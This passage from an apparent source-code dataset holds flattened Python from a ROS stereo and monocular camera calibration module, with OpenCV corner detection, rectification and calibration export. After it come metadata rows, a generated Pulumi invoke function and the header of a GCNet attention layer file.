"""
for b in self._boards:
if self.pattern == Patterns.Chessboard:
(ok, corners) = _get_corners(img, b, refine, self.checkerboard_flags)
else:
(ok, corners) = _get_circles(img, b, self.pattern)
if ok:
return (ok, corners, b)
return (False, None, None)
def downsample_and_detect(self, img):
"""
Downsample the input image to approximately VGA resolution and detect the
calibration target corners in the full-size image.
Combines these apparently orthogonal duties as an optimization. Checkerboard
detection is too expensive on large images, so it's better to do detection on
the smaller display image and scale the corners back up to the correct size.
Returns (scrib, corners, downsampled_corners, board, (x_scale, y_scale)).
"""
# Scale the input image down to ~VGA size
height = img.shape[0]
width = img.shape[1]
scale = math.sqrt( (width*height) / (640.*480.) )
if scale > 1.0:
scrib = cv2.resize(img, (int(width / scale), int(height / scale)))
else:
scrib = img
# Due to rounding, actual horizontal/vertical scaling may differ slightly
x_scale = float(width) / scrib.shape[1]
y_scale = float(height) / scrib.shape[0]
if self.pattern == Patterns.Chessboard:
# Detect checkerboard
(ok, downsampled_corners, board) = self.get_corners(scrib, refine = True)
# Scale corners back to full size image
corners = None
if ok:
if scale > 1.0:
# Refine up-scaled corners in the original full-res image
# TODO Does this really make a difference in practice?
corners_unrefined = downsampled_corners.copy()
corners_unrefined[:, :, 0] *= x_scale
corners_unrefined[:, :, 1] *= y_scale
radius = int(math.ceil(scale))
if len(img.shape) == 3 and img.shape[2] == 3:
mono = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
else:
mono = img
cv2.cornerSubPix(mono, corners_unrefined, (radius,radius), (-1,-1),
( cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.1 ))
corners = corners_unrefined
else:
corners = downsampled_corners
else:
# Circle grid detection is fast even on large images
(ok, corners, board) = self.get_corners(img)
# Scale corners to downsampled image for display
downsampled_corners = None
if ok:
if scale > 1.0:
downsampled_corners = corners.copy()
downsampled_corners[:,:,0] /= x_scale
downsampled_corners[:,:,1] /= y_scale
else:
downsampled_corners = corners
return (scrib, corners, downsampled_corners, board, (x_scale, y_scale))
@staticmethod
def lrmsg(d, k, r, p, size, camera_model):
""" Used by :meth:`as_message`. Return a CameraInfo message for the given calibration matrices """
msg = sensor_msgs.msg.CameraInfo()
msg.width, msg.height = size
msg.distortion_model = _get_dist_model(d, camera_model)
msg.D = numpy.ravel(d).copy().tolist()
msg.K = numpy.ravel(k).copy().tolist()
msg.R = numpy.ravel(r).copy().tolist()
msg.P = numpy.ravel(p).copy().tolist()
return msg
@staticmethod
def lrreport(d, k, r, p):
print("D =", numpy.ravel(d).tolist())
print("K =", numpy.ravel(k).tolist())
print("R =", numpy.ravel(r).tolist())
print("P =", numpy.ravel(p).tolist())
@staticmethod
def lrost(name, d, k, r, p, size):
assert k.shape == (3, 3)
assert r.shape == (3, 3)
assert p.shape == (3, 4)
calmessage = "\n".join([
"# oST version 5.0 parameters",
"",
"",
"[image]",
"",
"width",
"%d" % size[0],
"",
"height",
"%d" % size[1],
"",
"[%s]" % name,
"",
"camera matrix",
" ".join("%8f" % k[0,i] for i in range(3)),
" ".join("%8f" % k[1,i] for i in range(3)),
" ".join("%8f" % k[2,i] for i in range(3)),
"",
"distortion",
" ".join("%8f" % x for x in d.flat),
"",
"rectification",
" ".join("%8f" % r[0,i] for i in range(3)),
" ".join("%8f" % r[1,i] for i in range(3)),
" ".join("%8f" % r[2,i] for i in range(3)),
"",
"projection",
" ".join("%8f" % p[0,i] for i in range(4)),
" ".join("%8f" % p[1,i] for i in range(4)),
" ".join("%8f" % p[2,i] for i in range(4)),
""
])
assert len(calmessage) < 525, "Calibration info must be less than 525 bytes"
return calmessage
@staticmethod
def lryaml(name, d, k, r, p, size, cam_model):
def format_mat(x, precision):
return ("[%s]" % (
numpy.array2string(x, precision=precision, suppress_small=True, separator=", ")
.replace("[", "").replace("]", "").replace("\n", "\n ")
))
dist_model = _get_dist_model(d, cam_model)
assert k.shape == (3, 3)
assert r.shape == (3, 3)
assert p.shape == (3, 4)
calmessage = "\n".join([
"image_width: %d" % size[0],
"image_height: %d" % size[1],
"camera_name: " + name,
"camera_matrix:",
" rows: 3",
" cols: 3",
" data: " + format_mat(k, 5),
"camera_model: " + dist_model,
"distortion_coefficients:",
" rows: 1",
" cols: %d" % d.size,
" data: [%s]" % ", ".join("%8f" % x for x in d.flat),
"rectification_matrix:",
" rows: 3",
" cols: 3",
" data: " + format_mat(r, 8),
"projection_matrix:",
" rows: 3",
" cols: 4",
" data: " + format_mat(p, 5),
""
])
return calmessage
def do_save(self):
filename = '/tmp/calibrationdata.tar.gz'
tf = tarfile.open(filename, 'w:gz')
self.do_tarfile_save(tf) # Must be overridden in subclasses
tf.close()
print(("Wrote calibration data to", filename))
def image_from_archive(archive, name):
"""
Load image PGM file from tar archive.
Used for tarfile loading and unit test.
"""
member = archive.getmember(name)
    # numpy.fromstring is deprecated; frombuffer gives a read-only 1-D view,
    # which cv2.imdecode accepts directly.
    imagefiledata = numpy.frombuffer(archive.extractfile(member).read(), numpy.uint8)
    return cv2.imdecode(imagefiledata, cv2.IMREAD_COLOR)
class ImageDrawable(object):
"""
Passed to CalibrationNode after image handled. Allows plotting of images
with detected corner points
"""
def __init__(self):
self.params = None
class MonoDrawable(ImageDrawable):
def __init__(self):
ImageDrawable.__init__(self)
self.scrib = None
self.linear_error = -1.0
class StereoDrawable(ImageDrawable):
def __init__(self):
ImageDrawable.__init__(self)
self.lscrib = None
self.rscrib = None
self.epierror = -1
self.dim = -1
class MonoCalibrator(Calibrator):
"""
Calibration class for monocular cameras::
        images = [cv2.imread("mono%d.png" % i) for i in range(8)]
        mc = MonoCalibrator([ChessboardInfo(8, 6, 0.025)])
        mc.cal(images)
        print(mc.as_message())
"""
is_mono = True # TODO Could get rid of is_mono
def __init__(self, *args, **kwargs):
if 'name' not in kwargs:
kwargs['name'] = 'narrow_stereo/left'
super(MonoCalibrator, self).__init__(*args, **kwargs)
def cal(self, images):
"""
Calibrate camera from given images
"""
goodcorners = self.collect_corners(images)
self.cal_fromcorners(goodcorners)
self.calibrated = True
def collect_corners(self, images):
"""
:param images: source images containing chessboards
:type images: list of :class:`cvMat`
Find chessboards in all images.
Return [ (corners, ChessboardInfo) ]
"""
self.size = (images[0].shape[1], images[0].shape[0])
corners = [self.get_corners(i) for i in images]
goodcorners = [(co, b) for (ok, co, b) in corners if ok]
if not goodcorners:
raise CalibrationException("No corners found in images!")
return goodcorners
def cal_fromcorners(self, good):
"""
:param good: Good corner positions and boards
:type good: [(corners, ChessboardInfo)]
"""
boards = [ b for (_, b) in good ]
ipts = [ points for (points, _) in good ]
opts = self.mk_object_points(boards)
# If FIX_ASPECT_RATIO flag set, enforce focal lengths have 1/1 ratio
intrinsics_in = numpy.eye(3, dtype=numpy.float64)
if self.camera_model == CAMERA_MODEL.PINHOLE:
reproj_err, self.intrinsics, dist_coeffs, rvecs, tvecs = cv2.calibrateCamera(
opts, ipts,
self.size,
intrinsics_in,
None,
flags = self.calib_flags)
# OpenCV returns more than 8 coefficients (the additional ones all zeros) when CALIB_RATIONAL_MODEL is set.
# The extra ones include e.g. thin prism coefficients, which we are not interested in.
self.distortion = dist_coeffs.flat[:8].reshape(-1, 1)
elif self.camera_model == CAMERA_MODEL.FISHEYE:
reproj_err, self.intrinsics, self.distortion, rvecs, tvecs = cv2.fisheye.calibrate(
opts, ipts, self.size,
intrinsics_in, None, flags = self.fisheye_calib_flags)
# R is identity matrix for monocular calibration
self.R = numpy.eye(3, dtype=numpy.float64)
self.P = numpy.zeros((3, 4), dtype=numpy.float64)
self.set_alpha(0.0)
def set_alpha(self, a):
"""
Set the alpha value for the calibrated camera solution. The alpha
value is a zoom, and ranges from 0 (zoomed in, all pixels in
calibrated image are valid) to 1 (zoomed out, all pixels in
original image are in calibrated image).
"""
if self.camera_model == CAMERA_MODEL.PINHOLE:
# NOTE: Prior to Electric, this code was broken such that we never actually saved the new
# camera matrix. In effect, this enforced P = [K|0] for monocular cameras.
# TODO: Verify that OpenCV #1199 gets applied (improved GetOptimalNewCameraMatrix)
ncm, _ = cv2.getOptimalNewCameraMatrix(self.intrinsics, self.distortion, self.size, a)
for j in range(3):
for i in range(3):
self.P[j,i] = ncm[j, i]
self.mapx, self.mapy = cv2.initUndistortRectifyMap(self.intrinsics, self.distortion, self.R, ncm, self.size, cv2.CV_32FC1)
elif self.camera_model == CAMERA_MODEL.FISHEYE:
# NOTE: estimateNewCameraMatrixForUndistortRectify not producing proper results, using a naive approach instead:
self.P[:3,:3] = self.intrinsics[:3,:3]
self.P[0,0] /= (1. + a)
self.P[1,1] /= (1. + a)
self.mapx, self.mapy = cv2.fisheye.initUndistortRectifyMap(self.intrinsics, self.distortion, self.R, self.P, self.size, cv2.CV_32FC1)
def remap(self, src):
"""
:param src: source image
:type src: :class:`cvMat`
Apply the post-calibration undistortion to the source image
"""
return cv2.remap(src, self.mapx, self.mapy, cv2.INTER_LINEAR)
def undistort_points(self, src):
"""
:param src: N source pixel points (u,v) as an Nx2 matrix
:type src: :class:`cvMat`
Apply the post-calibration undistortion to the source points
"""
if self.camera_model == CAMERA_MODEL.PINHOLE:
return cv2.undistortPoints(src, self.intrinsics, self.distortion, R = self.R, P = self.P)
elif self.camera_model == CAMERA_MODEL.FISHEYE:
return cv2.fisheye.undistortPoints(src, self.intrinsics, self.distortion, R = self.R, P = self.P)
def as_message(self):
""" Return the camera calibration as a CameraInfo message """
return self.lrmsg(self.distortion, self.intrinsics, self.R, self.P, self.size, self.camera_model)
def from_message(self, msg, alpha = 0.0):
""" Initialize the camera calibration from a CameraInfo message """
self.size = (msg.width, msg.height)
self.intrinsics = numpy.array(msg.K, dtype=numpy.float64, copy=True).reshape((3, 3))
self.distortion = numpy.array(msg.D, dtype=numpy.float64, copy=True).reshape((len(msg.D), 1))
self.R = numpy.array(msg.R, dtype=numpy.float64, copy=True).reshape((3, 3))
self.P = numpy.array(msg.P, dtype=numpy.float64, copy=True).reshape((3, 4))
self.set_alpha(0.0)
def report(self):
self.lrreport(self.distortion, self.intrinsics, self.R, self.P)
def ost(self):
return self.lrost(self.name, self.distortion, self.intrinsics, self.R, self.P, self.size)
def yaml(self):
return self.lryaml(self.name, self.distortion, self.intrinsics, self.R, self.P, self.size, self.camera_model)
def linear_error_from_image(self, image):
"""
Detect the checkerboard and compute the linear error.
Mainly for use in tests.
"""
_, corners, _, board, _ = self.downsample_and_detect(image)
if corners is None:
return None
undistorted = self.undistort_points(corners)
return self.linear_error(undistorted, board)
@staticmethod
def linear_error(corners, b):
"""
Returns the linear error for a set of corners detected in the unrectified image.
"""
if corners is None:
return None
def pt2line(x0, y0, x1, y1, x2, y2):
""" point is (x0, y0), line is (x1, y1, x2, y2) """
return abs((x2 - x1) * (y1 - y0) - (x1 - x0) * (y2 - y1)) / math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)
cc = b.n_cols
cr = b.n_rows
errors = []
for r in range(cr):
(x1, y1) = corners[(cc * r) + 0, 0]
(x2, y2) = corners[(cc * r) + cc - 1, 0]
for i in range(1, cc - 1):
(x0, y0) = corners[(cc * r) + i, 0]
errors.append(pt2line(x0, y0, x1, y1, x2, y2))
if errors:
return math.sqrt(sum([e**2 for e in errors]) / len(errors))
else:
return None
def handle_msg(self, msg):
"""
Detects the calibration target and, if found and provides enough new information,
adds it to the sample database.
Returns a MonoDrawable message with the display image and progress info.
"""
gray = self.mkgray(msg)
linear_error = -1
# Get display-image-to-be (scrib) and detection of the calibration target
scrib_mono, corners, downsampled_corners, board, (x_scale, y_scale) = self.downsample_and_detect(gray)
if self.calibrated:
# Show rectified image
# TODO Pull out downsampling code into function
gray_remap = self.remap(gray)
gray_rect = gray_remap
if x_scale != 1.0 or y_scale != 1.0:
gray_rect = cv2.resize(gray_remap, (scrib_mono.shape[1], scrib_mono.shape[0]))
scrib = cv2.cvtColor(gray_rect, cv2.COLOR_GRAY2BGR)
if corners is not None:
# Report linear error
undistorted = self.undistort_points(corners)
linear_error = self.linear_error(undistorted, board)
# Draw rectified corners
scrib_src = undistorted.copy()
scrib_src[:,:,0] /= x_scale
scrib_src[:,:,1] /= y_scale
cv2.drawChessboardCorners(scrib, (board.n_cols, board.n_rows), scrib_src, True)
else:
scrib = cv2.cvtColor(scrib_mono, cv2.COLOR_GRAY2BGR)
if corners is not None:
# Draw (potentially downsampled) corners onto display image
cv2.drawChessboardCorners(scrib, (board.n_cols, board.n_rows), downsampled_corners, True)
# Add sample to database only if it's sufficiently different from any previous sample.
params = self.get_parameters(corners, board, (gray.shape[1], gray.shape[0]))
if self.is_good_sample(params, corners, self.last_frame_corners):
self.db.append((params, gray))
self.good_corners.append((corners, board))
print(("*** Added sample %d, p_x = %.3f, p_y = %.3f, p_size = %.3f, skew = %.3f" % tuple([len(self.db)] + params)))
self.last_frame_corners = corners
rv = MonoDrawable()
rv.scrib = scrib
rv.params = self.compute_goodenough()
rv.linear_error = linear_error
return rv
def do_calibration(self, dump = False):
if not self.good_corners:
print("**** Collecting corners for all images! ****") #DEBUG
images = [i for (p, i) in self.db]
self.good_corners = self.collect_corners(images)
self.size = (self.db[0][1].shape[1], self.db[0][1].shape[0]) # TODO Needs to be set externally
# Dump should only occur if user wants it
if dump:
pickle.dump((self.is_mono, self.size, self.good_corners),
open("/tmp/camera_calibration_%08x.pickle" % random.getrandbits(32), "w"))
self.cal_fromcorners(self.good_corners)
self.calibrated = True
# DEBUG
print((self.report()))
print((self.ost()))
def do_tarfile_save(self, tf):
""" Write images and calibration solution to a tarfile object """
def taradd(name, buf):
            if isinstance(buf, str):
s = StringIO(buf)
else:
s = BytesIO(buf)
ti = tarfile.TarInfo(name)
ti.size = len(s.getvalue())
ti.uname = 'calibrator'
ti.mtime = int(time.time())
tf.addfile(tarinfo=ti, fileobj=s)
ims = [("left-%04d.png" % i, im) for i,(_, im) in enumerate(self.db)]
for (name, im) in ims:
            taradd(name, cv2.imencode(".png", im)[1].tobytes())
taradd('ost.yaml', self.yaml())
taradd('ost.txt', self.ost())
def do_tarfile_calibration(self, filename):
archive = tarfile.open(filename, 'r')
limages = [ image_from_archive(archive, f) for f in archive.getnames() if (f.startswith('left') and (f.endswith('.pgm') or f.endswith('png'))) ]
self.cal(limages)
# TODO Replicate MonoCalibrator improvements in stereo
class StereoCalibrator(Calibrator):
"""
Calibration class for stereo cameras::
        limages = [cv2.imread("left%d.png" % i) for i in range(8)]
        rimages = [cv2.imread("right%d.png" % i) for i in range(8)]
        sc = StereoCalibrator([ChessboardInfo(8, 6, 0.025)])
        sc.cal(limages, rimages)
        print(sc.as_message())
"""
is_mono = False
def __init__(self, *args, **kwargs):
if 'name' not in kwargs:
kwargs['name'] = 'narrow_stereo'
super(StereoCalibrator, self).__init__(*args, **kwargs)
self.l = MonoCalibrator(*args, **kwargs)
self.r = MonoCalibrator(*args, **kwargs)
# Collecting from two cameras in a horizontal stereo rig, can't get
# full X range in the left camera.
self.param_ranges[0] = 0.4
def cal(self, limages, rimages):
"""
:param limages: source left images containing chessboards
:type limages: list of :class:`cvMat`
:param rimages: source right images containing chessboards
:type rimages: list of :class:`cvMat`
Find chessboards in images, and runs the OpenCV calibration solver.
"""
goodcorners = self.collect_corners(limages, rimages)
self.size = (limages[0].shape[1], limages[0].shape[0])
self.l.size = self.size
self.r.size = self.size
self.cal_fromcorners(goodcorners)
self.calibrated = True
def collect_corners(self, limages, rimages):
"""
For a sequence of left and right images, find pairs of images where both
left and right have a chessboard, and return their corners as a list of pairs.
"""
# Pick out (corners, board) tuples
lcorners = [ self.downsample_and_detect(i)[1:4:2] for i in limages]
rcorners = [ self.downsample_and_detect(i)[1:4:2] for i in rimages]
good = [(lco, rco, b) for ((lco, b), (rco, br)) in zip( lcorners, rcorners)
if (lco is not None and rco is not None)]
if len(good) == 0:
raise CalibrationException("No corners found in images!")
return good
def cal_fromcorners(self, good):
# Perform monocular calibrations
lcorners = [(l, b) for (l, r, b) in good]
rcorners = [(r, b) for (l, r, b) in good]
self.l.cal_fromcorners(lcorners)
self.r.cal_fromcorners(rcorners)
lipts = [ l for (l, _, _) in good ]
ripts = [ r for (_, r, _) in good ]
boards = [ b for (_, _, b) in good ]
opts = self.mk_object_points(boards, True)
flags = cv2.CALIB_FIX_INTRINSIC
self.T = numpy.zeros((3, 1), dtype=numpy.float64)
self.R = numpy.eye(3, dtype=numpy.float64)
if self.camera_model == CAMERA_MODEL.PINHOLE:
if LooseVersion(cv2.__version__).version[0] == 2:
cv2.stereoCalibrate(opts, lipts, ripts, self.size,
self.l.intrinsics, self.l.distortion,
self.r.intrinsics, self.r.distortion,
self.R, # R
self.T, # T
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 1, 1e-5),
flags = flags)
else:
cv2.stereoCalibrate(opts, lipts, ripts,
self.l.intrinsics, self.l.distortion,
self.r.intrinsics, self.r.distortion,
self.size,
self.R, # R
self.T, # T
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 1, 1e-5),
flags = flags)
elif self.camera_model == CAMERA_MODEL.FISHEYE:
if LooseVersion(cv2.__version__).version[0] == 2:
print("ERROR: You need OpenCV >3 to use fisheye camera model")
sys.exit()
else:
cv2.fisheye.stereoCalibrate(opts, lipts, ripts,
self.l.intrinsics, self.l.distortion,
self.r.intrinsics, self.r.distortion,
self.size,
self.R, # R
self.T, # T
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 1, 1e-5), # 30, 1e-6
flags = flags)
self.set_alpha(0.0)
def set_alpha(self, a):
"""
Set the alpha value for the calibrated camera solution. The
alpha value is a zoom, and ranges from 0 (zoomed in, all pixels
in calibrated image are valid) to 1 (zoomed out, all pixels in
original image are in calibrated image).
"""
if self.camera_model == CAMERA_MODEL.PINHOLE:
cv2.stereoRectify(self.l.intrinsics,
self.l.distortion,
self.r.intrinsics,
self.r.distortion,
self.size,
self.R,
self.T,
self.l.R, self.r.R, self.l.P, self.r.P,
alpha = a)
cv2.initUndistortRectifyMap(self.l.intrinsics, self.l.distortion, self.l.R, self.l.P, self.size, cv2.CV_32FC1,
self.l.mapx, self.l.mapy)
cv2.initUndistortRectifyMap(self.r.intrinsics, self.r.distortion, self.r.R, self.r.P, self.size, cv2.CV_32FC1,
self.r.mapx, self.r.mapy)
elif self.camera_model == CAMERA_MODEL.FISHEYE:
self.Q = numpy.zeros((4,4), dtype=numpy.float64)
flags = cv2.CALIB_ZERO_DISPARITY # Operation flags that may be zero or CALIB_ZERO_DISPARITY .
# If the flag is set, the function makes the principal points of each camera have the same pixel coordinates in the rectified views.
# And if the flag is not set, the function may still shift the images in the horizontal or vertical direction
# (depending on the orientation of epipolar lines) to maximize the useful image area.
cv2.fisheye.stereoRectify(self.l.intrinsics, self.l.distortion,
self.r.intrinsics, self.r.distortion,
self.size,
self.R, self.T,
flags,
self.l.R, self.r.R,
self.l.P, self.r.P,
self.Q,
self.size,
a,
1.0 )
self.l.P[:3,:3] = numpy.dot(self.l.intrinsics,self.l.R)
self.r.P[:3,:3] = numpy.dot(self.r.intrinsics,self.r.R)
cv2.fisheye.initUndistortRectifyMap(self.l.intrinsics, self.l.distortion, self.l.R, self.l.intrinsics, self.size, cv2.CV_32FC1,
self.l.mapx, self.l.mapy)
cv2.fisheye.initUndistortRectifyMap(self.r.intrinsics, self.r.distortion, self.r.R, self.r.intrinsics, self.size, cv2.CV_32FC1,
self.r.mapx, self.r.mapy)
def as_message(self):
"""
Return the camera calibration as a pair of CameraInfo messages, for left
and right cameras respectively.
"""
return (self.lrmsg(self.l.distortion, self.l.intrinsics, self.l.R, self.l.P, self.size, self.l.camera_model),
self.lrmsg(self.r.distortion, self.r.intrinsics, self.r.R, self.r.P, self.size, self.r.camera_model))
def from_message(self, msgs, alpha = 0.0):
""" Initialize the camera calibration from a pair of CameraInfo messages. """
self.size = (msgs[0].width, msgs[0].height)
self.T = numpy.zeros((3, 1), dtype=numpy.float64)
self.R = numpy.eye(3, dtype=numpy.float64)
self.l.from_message(msgs[0])
self.r.from_message(msgs[1])
# Need to compute self.T and self.R here, using the monocular parameters above
if False:
self.set_alpha(0.0)
def report(self):
print("\nLeft:")
self.lrreport(self.l.distortion, self.l.intrinsics, self.l.R, self.l.P)
print("\nRight:")
self.lrreport(self.r.distortion, self.r.intrinsics, self.r.R, self.r.P)
print("self.T =", numpy.ravel(self.T).tolist())
print("self.R =", numpy.ravel(self.R).tolist())
def ost(self):
return (self.lrost(self.name + "/left", self.l.distortion, self.l.intrinsics, self.l.R, self.l.P, self.size) +
self.lrost(self.name + "/right", self.r.distortion, self.r.intrinsics, self.r.R, self.r.P, self.size))
def yaml(self, suffix, info):
return self.lryaml(self.name + suffix, info.distortion, info.intrinsics, info.R, info.P, self.size, self.camera_model)
# TODO Get rid of "from_images" versions of these, instead have function to get undistorted corners
def epipolar_error_from_images(self, limage, rimage):
"""
Detect the checkerboard in both images and compute the epipolar error.
Mainly for use in tests.
"""
lcorners = self.downsample_and_detect(limage)[1]
rcorners = self.downsample_and_detect(rimage)[1]
if lcorners is None or rcorners is None:
return None
lundistorted = self.l.undistort_points(lcorners)
rundistorted = self.r.undistort_points(rcorners)
return self.epipolar_error(lundistorted, rundistorted)
def epipolar_error(self, lcorners, rcorners):
"""
Compute the epipolar error from two sets of matching undistorted points
"""
d = lcorners[:,:,1] - rcorners[:,:,1]
return numpy.sqrt(numpy.square(d).sum() / d.size)
def chessboard_size_from_images(self, limage, rimage):
_, lcorners, _, board, _ = self.downsample_and_detect(limage)
_, rcorners, _, board, _ = self.downsample_and_detect(rimage)
if lcorners is None or rcorners is None:
return None
lundistorted = self.l.undistort_points(lcorners)
rundistorted = self.r.undistort_points(rcorners)
return self.chessboard_size(lundistorted, rundistorted, board)
def chessboard_size(self, lcorners, rcorners, board, msg = None):
"""
Compute the square edge length from two sets of matching undistorted points
given the current calibration.
:param msg: a tuple of (left_msg, right_msg)
"""
# Project the points to 3d
cam = image_geometry.StereoCameraModel()
if msg == None:
msg = self.as_message()
cam.fromCameraInfo(*msg)
disparities = lcorners[:,:,0] - rcorners[:,:,0]
pt3d = [cam.projectPixelTo3d((lcorners[i,0,0], lcorners[i,0,1]), disparities[i,0]) for i in range(lcorners.shape[0]) ]
def l2(p0, p1):
return math.sqrt(sum([(c0 - c1) ** 2 for (c0, c1) in zip(p0, p1)]))
# Compute the length from each horizontal and vertical line, and return the mean
cc = board.n_cols
cr = board.n_rows
lengths = (
[l2(pt3d[cc * r + 0], pt3d[cc * r + (cc - 1)]) / (cc - 1) for r in range(cr)] +
[l2(pt3d[c + 0], pt3d[c + (cc * (cr - 1))]) / (cr - 1) for c in range(cc)])
return sum(lengths) / len(lengths)
def handle_msg(self, msg):
# TODO Various asserts that images have same dimension, same board detected...
(lmsg, rmsg) = msg
lgray = self.mkgray(lmsg)
rgray = self.mkgray(rmsg)
epierror = -1
# Get display-images-to-be and detections of the calibration target
lscrib_mono, lcorners, ldownsampled_corners, lboard, (x_scale, y_scale) = self.downsample_and_detect(lgray)
rscrib_mono, rcorners, rdownsampled_corners, rboard, _ = self.downsample_and_detect(rgray)
if self.calibrated:
# Show rectified images
lremap = self.l.remap(lgray)
rremap = self.r.remap(rgray)
lrect = lremap
rrect = rremap
if x_scale != 1.0 or y_scale != 1.0:
lrect = cv2.resize(lremap, (lscrib_mono.shape[1], lscrib_mono.shape[0]))
rrect = cv2.resize(rremap, (rscrib_mono.shape[1], rscrib_mono.shape[0]))
lscrib = cv2.cvtColor(lrect, cv2.COLOR_GRAY2BGR)
rscrib = cv2.cvtColor(rrect, cv2.COLOR_GRAY2BGR)
# Draw rectified corners
if lcorners is not None:
lundistorted = self.l.undistort_points(lcorners)
scrib_src = lundistorted.copy()
scrib_src[:,:,0] /= x_scale
scrib_src[:,:,1] /= y_scale
cv2.drawChessboardCorners(lscrib, (lboard.n_cols, lboard.n_rows), scrib_src, True)
if rcorners is not None:
rundistorted = self.r.undistort_points(rcorners)
scrib_src = rundistorted.copy()
scrib_src[:,:,0] /= x_scale
scrib_src[:,:,1] /= y_scale
cv2.drawChessboardCorners(rscrib, (rboard.n_cols, rboard.n_rows), scrib_src, True)
# Report epipolar error
if lcorners is not None and rcorners is not None and len(lcorners) == len(rcorners):
epierror = self.epipolar_error(lundistorted, rundistorted)
else:
lscrib = cv2.cvtColor(lscrib_mono, cv2.COLOR_GRAY2BGR)
rscrib = cv2.cvtColor(rscrib_mono, cv2.COLOR_GRAY2BGR)
# Draw any detected chessboards onto display (downsampled) images
if lcorners is not None:
cv2.drawChessboardCorners(lscrib, (lboard.n_cols, lboard.n_rows),
ldownsampled_corners, True)
if rcorners is not None:
cv2.drawChessboardCorners(rscrib, (rboard.n_cols, rboard.n_rows),
rdownsampled_corners, True)
# Add sample to database only if it's sufficiently different from any previous sample
if lcorners is not None and rcorners is not None and len(lcorners) == len(rcorners):
params = self.get_parameters(lcorners, lboard, (lgray.shape[1], lgray.shape[0]))
if self.is_good_sample(params, lcorners, self.last_frame_corners):
self.db.append( (params, lgray, rgray) )
self.good_corners.append( (lcorners, rcorners, lboard) )
print(("*** Added sample %d, p_x = %.3f, p_y = %.3f, p_size = %.3f, skew = %.3f" % tuple([len(self.db)] + params)))
self.last_frame_corners = lcorners
rv = StereoDrawable()
rv.lscrib = lscrib
rv.rscrib = rscrib
rv.params = self.compute_goodenough()
rv.epierror = epierror
return rv
def do_calibration(self, dump = False):
# TODO MonoCalibrator collects corners if needed here
self.size = (self.db[0][1].shape[1], self.db[0][1].shape[0]) # TODO Needs to be set externally
# Dump should only occur if user wants it
if dump:
pickle.dump((self.is_mono, self.size, self.good_corners),
open("/tmp/camera_calibration_%08x.pickle" % random.getrandbits(32), "w"))
self.l.size = self.size
self.r.size = self.size
self.cal_fromcorners(self.good_corners)
self.calibrated = True
# DEBUG
print((self.report()))
print((self.ost()))
def do_tarfile_save(self, tf):
""" Write images and calibration solution to a tarfile object """
ims = ([("left-%04d.png" % i, im) for i,(_, im, _) in enumerate(self.db)] +
[("right-%04d.png" % i, im) for i,(_, _, im) in enumerate(self.db)])
def taradd(name, buf):
            if isinstance(buf, str):
s = StringIO(buf)
else:
s = BytesIO(buf)
ti = tarfile.TarInfo(name)
ti.size = len(s.getvalue())
ti.uname = 'calibrator'
ti.mtime = int(time.time())
tf.addfile(tarinfo=ti, fileobj=s)
for (name, im) in ims:
            taradd(name, cv2.imencode(".png", im)[1].tobytes())
taradd('left.yaml', self.yaml("/left", self.l))
taradd('right.yaml', self.yaml("/right", self.r))
taradd('ost.txt', self.ost())
def do_tarfile_calibration(self, filename):
archive = tarfile.open(filename, 'r')
limages = [ image_from_archive(archive, f) for f in archive.getnames() if (f.startswith('left') and (f.endswith('pgm') or f.endswith('png'))) ]
rimages = [ image_from_archive(archive, f) for f in archive.getnames() if (f.startswith('right') and (f.endswith('pgm') or f.endswith('png'))) ]
if not len(limages) == len(rimages):
raise CalibrationException("Left, right images don't match. %d left images, %d right" % (len(limages), len(rimages)))
##\todo Check that the filenames match and stuff
self.cal(limages, rimages)
| [
"[email protected]"
] | |
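A minimal mono-calibration sketch assembled from the docstrings in the record above; the image filenames and board geometry (8x6 inner corners, 2.5 cm squares) are placeholders.

```python
import cv2
from camera_calibration.calibrator import ChessboardInfo, MonoCalibrator

board = ChessboardInfo(8, 6, 0.025)          # n_cols, n_rows, square size [m]
images = [cv2.imread('mono%d.png' % i) for i in range(8)]

mc = MonoCalibrator([board])
mc.cal(images)            # finds corners in every image, then solves
print(mc.as_message())    # sensor_msgs/CameraInfo with D, K, R, P filled in
```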
02d805ec2da1c542813f48e2d36487ea8c3282fd | 54a18823b019112c53fc62766da10cbe5f879615 | /pkg/codegen/internal/test/testdata/output-funcs/py_tests/funcWithConstInput.py | d3ba8492d878603b3f22f3f1d551e00dbb14a2fe | [
"Apache-2.0"
] | permissive | TrendingTechnology/pulumi | 01904487b2560244c3588004b562571f85cf2e51 | 1a4f36e97b15e6a25d92a8ebbabd5238c6c5be54 | refs/heads/master | 2023-07-27T19:38:17.162679 | 2021-09-16T04:12:49 | 2021-09-16T04:12:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 832 | py | # coding=utf-8
# *** WARNING: this file was generated by . ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'func_with_const_input',
]
def func_with_const_input(plain_input: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None):
"""
Codegen demo with const inputs
"""
__args__ = dict()
__args__['plainInput'] = plain_input
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('madeup-package:codegentest:funcWithConstInput', __args__, opts=opts).value
| [
"[email protected]"
] | |
be9142c193081f1a1035d6f272c22cc11c1b0e9d | 2bc8f66fd34ba1b93de82c67954a10f8b300b07e | /general_backbone/layers/global_context.py | 0c80d60097c862eb96f2e9085a77dbbde1fa354a | [] | no_license | DoDucNhan/general_backbone | 7dabffed5a74e622ba23bf275358ca2d09faddc1 | 686c92ab811221d594816207d86a0b97c9b4bc73 | refs/heads/main | 2023-08-31T14:59:23.873555 | 2021-10-23T06:34:14 | 2021-10-23T06:34:14 | 420,419,141 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,449 | py | # Copyright (c) general_backbone. All rights reserved.
""" Global Context Attention Block
Paper: `GCNet: Non-local Networks Meet Squeeze-Excitation Networks and Beyond`
- https://arxiv.org/abs/1904.11492
Official code consulted as reference: https://github.com/xvjiarui/GCNet
"""
from torch import nn as nn
